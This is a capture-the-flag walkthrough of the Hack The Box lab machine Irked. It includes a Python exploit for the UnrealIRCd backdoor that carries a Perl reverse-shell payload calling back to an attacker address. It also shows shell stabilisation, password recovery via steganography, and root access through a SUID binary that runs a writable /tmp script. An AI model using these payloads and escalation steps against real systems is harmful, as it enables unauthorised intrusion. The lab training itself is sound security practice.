Htb Irked
by jake
This week we are taking a look at the retired Hack The Box machine Irked (Easy difficulty)
Run nmap
root@kali: nmap -sC -sV -oN nmap 10.10.10.117
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-31 16:37 AEDT
Nmap scan report for 10.10.10.117
Host is up (0.23s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
| 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
| 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 54516/tcp status
|_ 100024 1 59966/udp status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.11 seconds
Looks like something called RPCBind is listening, lets do some research: https://linux.die.net/man/8/rpcbind
Looks like it’s a service that manages handing out ports to RPC based applications on a server. for example if I have an app that needs to listen, it tells RPC bind, which assigns a port, and can tell requesting clients what port to listen on. Nothing interesting on the main 111 port, but maybe there’s something on one of the bound RPC ports:
root@kali: nmap -sV -p 54516 10.10.10.117
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-31 16:46 AEDT
Nmap scan report for 10.10.10.117
Host is up (0.23s latency).
PORT STATE SERVICE VERSION
54516/tcp open status 1 (RPC #100024)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.78 seconds
and the UDP one:
kali :: ~/CTFs/irked # nmap -sUV -p 59966 10.10.10.117
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-31 16:47 AEDT
Nmap scan report for 10.10.10.117
Host is up (0.23s latency).
PORT STATE SERVICE VERSION
59966/udp open status 1 (RPC #100024)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.75 seconds
Nothing obvious there, lets look at the site on port 80:
Not much of anything in the source:
We have a plain website so we need to do some enumeration to see if there is anything else hidden, so we run gobuster:
root@kali: gobuster -u http://10.10.10.117/ -k -x txt,php,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 150 -o gobuster.log
=====================================================
Gobuster v2.0.0 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.117/
[+] Threads : 150
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions : html,txt,php
[+] Timeout : 10s
=====================================================
2018/12/31 16:49:28 Starting gobuster
=====================================================
/index.html (Status: 200)
/manual (Status: 301)
Progress: 168405 / 882244 (19.09%)
Nothing on the website either, maybe there’s some other ports:
root@kali: nmap -p- --max-retries 1 -Pn -T4 --oN nmap-allports 10.10.10.117
Nmap scan report for 10.10.10.117
Host is up (0.23s latency).
Scanned at 2018-12-31 17:03:56 AEDT for 156s
Not shown: 65528 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
6697/tcp open ircs-u
8067/tcp open infi-async
54516/tcp open unknown
65534/tcp open unknown
Now that we have some ports let’s double check 6697 and 8067 with a more detailed scan:
root@kali: nmap -sC -sV -p 8067,6697 10.10.10.117
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-31 17:07 AEDT
Nmap scan report for 10.10.10.117
Host is up (0.23s latency).
PORT STATE SERVICE VERSION
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
Service Info: Host: irked.htb
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.66 seconds
Searching the service name for any known exploits we get some good results:
root@kali: searchsploit unrealirc
--------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------------------- ----------------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metaspl | exploits/linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow | exploits/windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute | exploits/linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service | exploits/windows/dos/27407.pl
--------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Looking through the exploits 13853 has a bunch of different payloads which look like they perform command execution, (probably the same as the metasploit module). Doing some research on the exploit it looks like it is a deliberate backdoor that allows command execution if the input starts with AB;
We came here to learn so let’s take what we have learned from the existing exploits and see if we can write our own:
import socket
ip = "10.10.10.117"
port = 8067
payload = b'AB;perl -MIO -e \'$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"10.10.14.6:8080");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};\';\n'
buf = 5000
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, port))
sock.send(payload)
data = sock.recv(buf)
sock.close
print(data)
Basically this exploit connects to the server and port then sends the backdoor command with another command to give us a reverse shell.
In one terminal we set up a listener with nc -nlvp 8080 update the IP and port in the payload, and run the exploit python3 exploit.py
Eventually we will get a basic reverse shell we can update with python:
python -c "import pty; pty.spawn('/bin/bash')"
and we are on the box with an interactive shell. Time to enumerate.
ircd@irked:~/Unreal3.2$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
messagebus:x:104:111::/var/run/dbus:/bin/false
avahi:x:105:112:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
Debian-exim:x:106:114::/var/spool/exim4:/bin/false
statd:x:107:65534::/var/lib/nfs:/bin/false
colord:x:108:118:colord colour management daemon,,,:/var/lib/colord:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
geoclue:x:110:119::/var/lib/geoclue:/bin/false
pulse:x:111:121:PulseAudio daemon,,,:/var/run/pulse:/bin/false
speech-dispatcher:x:112:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
sshd:x:113:65534::/var/run/sshd:/usr/sbin/nologin
rtkit:x:114:123:RealtimeKit,,,:/proc:/bin/false
saned:x:115:124::/var/lib/saned:/bin/false
usbmux:x:116:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
hplip:x:117:7:HPLIP system user,,,:/var/run/hplip:/bin/false
Debian-gdm:x:118:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
djmardov:x:1000:1000:djmardov,,,:/home/djmardov:/bin/bash
ircd:x:1001:1001::/home/ircd:/bin/sh
Okay, so it looks like for user we need to become djmarov.
A bit of enumerating finds us:
ircd@irked:/home/djmardov$ ls -la
ls -la
total 92
drwxr-xr-x 18 djmardov djmardov 4096 Nov 3 04:40 .
drwxr-xr-x 4 root root 4096 May 14 2018 ..
lrwxrwxrwx 1 root root 9 Nov 3 04:26 .bash_history -> /dev/null
-rw-r--r-- 1 djmardov djmardov 220 May 11 2018 .bash_logout
-rw-r--r-- 1 djmardov djmardov 3515 May 11 2018 .bashrc
drwx------ 13 djmardov djmardov 4096 May 15 2018 .cache
drwx------ 15 djmardov djmardov 4096 May 15 2018 .config
drwx------ 3 djmardov djmardov 4096 May 11 2018 .dbus
drwxr-xr-x 2 djmardov djmardov 4096 May 11 2018 Desktop
drwxr-xr-x 2 djmardov djmardov 4096 May 15 2018 Documents
drwxr-xr-x 2 djmardov djmardov 4096 May 14 2018 Downloads
drwx------ 3 djmardov djmardov 4096 Nov 3 04:40 .gconf
drwx------ 2 djmardov djmardov 4096 May 15 2018 .gnupg
-rw------- 1 djmardov djmardov 4706 Nov 3 04:40 .ICEauthority
drwx------ 3 djmardov djmardov 4096 May 11 2018 .local
drwx------ 4 djmardov djmardov 4096 May 11 2018 .mozilla
drwxr-xr-x 2 djmardov djmardov 4096 May 11 2018 Music
drwxr-xr-x 2 djmardov djmardov 4096 May 11 2018 Pictures
-rw-r--r-- 1 djmardov djmardov 675 May 11 2018 .profile
drwxr-xr-x 2 djmardov djmardov 4096 May 11 2018 Public
drwx------ 2 djmardov djmardov 4096 May 11 2018 .ssh
drwxr-xr-x 2 djmardov djmardov 4096 May 11 2018 Templates
drwxr-xr-x 2 djmardov djmardov 4096 May 11 2018 Videos
bash history is out, as is .ssh, as we don’t have permission. Lets look in Documents
ircd@irked:/home/djmardov/Documents$ ls -la
ls -la
total 16
drwxr-xr-x 2 djmardov djmardov 4096 May 15 2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov 3 04:40 ..
-rw-r--r-- 1 djmardov djmardov 52 May 16 2018 .backup
-rw------- 1 djmardov djmardov 33 May 15 2018 user.txt
Hmn, we can’t read user.txt because we don’t have permissions, but we can read .backup so let’s do that
ircd@irked:/home/djmardov/Documents$ cat .backup
Super elite steg backup pw
U[redacted]s
Steg… I wonder if that refers to stenography. Okay, there’s been nothing else on the box, let’s look at that jpeg on the website, it seems a good candidate.
Using steghide (which didn’t come in my copy of Kali, but apt install steghide solved that) extract the info out of the image.
root@kali: steghide extract -sf index.jpeg
Enter passphrase:
wrote extracted data to "pass.txt".
root@kali: cat pass.txt
Kab...J:HG
Great! We have a password hidden by djmardov, what if it is his SSH password?
root@kali: ssh djmardov@10.10.10.117 255 ↵
djmardov@10.10.10.117's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 15 08:56:32 2018 from 10.33.3.3
Boom. User.
Get the user.txt flag and begin to enumerate, when we check for any SUID binaries we see something interesting:
djmardov@irked:~$ find / -perm -4000 2>/dev/null | xargs ls -la
-rwsr-xr-x 1 root root 34208 Jan 21 2016 /bin/fusermount
-rwsr-xr-x 1 root root 34684 Mar 29 2015 /bin/mount
-rwsr-xr-x 1 root root 161584 Jan 28 2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 38868 May 17 2017 /bin/su
-rwsr-xr-x 1 root root 26344 Mar 29 2015 /bin/umount
-rwsr-xr-x 1 root root 96760 Aug 13 2014 /sbin/mount.nfs
-rwsr-sr-x 1 root root 9468 Apr 1 2014 /usr/bin/X
-rwsr-sr-x 1 daemon daemon 50644 Sep 30 2014 /usr/bin/at
-rwsr-xr-x 1 root root 52344 May 17 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 43576 May 17 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 78072 May 17 2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 38740 May 17 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 53112 May 17 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 18072 Sep 8 2016 /usr/bin/pkexec
-rwsr-sr-x 1 root mail 96192 Nov 18 2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 7328 May 16 2018 /usr/bin/viewuser
-rwsr-xr-- 1 root messagebus 362672 Nov 21 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 9468 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 562536 Nov 19 2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 13816 Sep 8 2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 13564 Oct 14 2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
-rwsr-xr-x 1 root root 1085300 Feb 10 2018 /usr/sbin/exim4
-rwsr-xr-- 1 root dip 338948 Apr 14 2015 /usr/sbin/pppd
When we compare this output with our local linux device. See if there’s any differences.
Procmail and viewuser were our main differences. Let’s see what viewuser does:
djmardov@irked:~/Documents$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 Dec 31 05:23 (:0)
djmardov pts/1 Dec 31 05:57 (10.10.14.6)
sh: 1: /tmp/listusers: not found
interesting, what happens if we create a /tmp/listusers script?
ls -la /root > /tmp/rootdir
When we try running viewuser again we get an error:
djmardov@irked:~/Documents$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 Dec 31 05:23 (:0)
djmardov pts/1 Dec 31 05:57 (10.10.14.6)
sh: 1: /tmp/listusers: Permission denied
Luckily this is easy to fix, we just need to give full control to the listusers file chmod 777 /tmp/listusers
This time when we run the script we get a rootdir file created with the contents of the /root directory:
djmardov@irked:~$ cat /tmp/test
total 28
drwx------ 2 root root 4096 Nov 3 04:25 .
drwxr-xr-x 21 root root 4096 May 15 2018 ..
lrwxrwxrwx 1 root root 9 Nov 3 04:25 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rw------- 1 root root 12 Nov 3 04:43 .nano_history
-rw-r--r-- 1 root root 140 Nov 19 2007 .profile
-rw-r--r-- 1 root root 17 May 14 2018 pass.txt
-rw------- 1 root root 33 May 15 2018 root.txt
No ssh keys, but there is a pass.txt. Next up we try to grab a copy of that and for good measure we can grab the root.txt as well:
cp /root/pass.txt /tmp/pass.txt
chmod 777 /tmp/pass.txt
cp /root/root.txt /tmp/root.txt
chmod 777 /tmp/root.txt
Turns out the pass.txt is the same as the one hidden in the image and is not the password for the root user, so we just grab the root.txt and call it a day.
tags: htb - walkthrough - Irked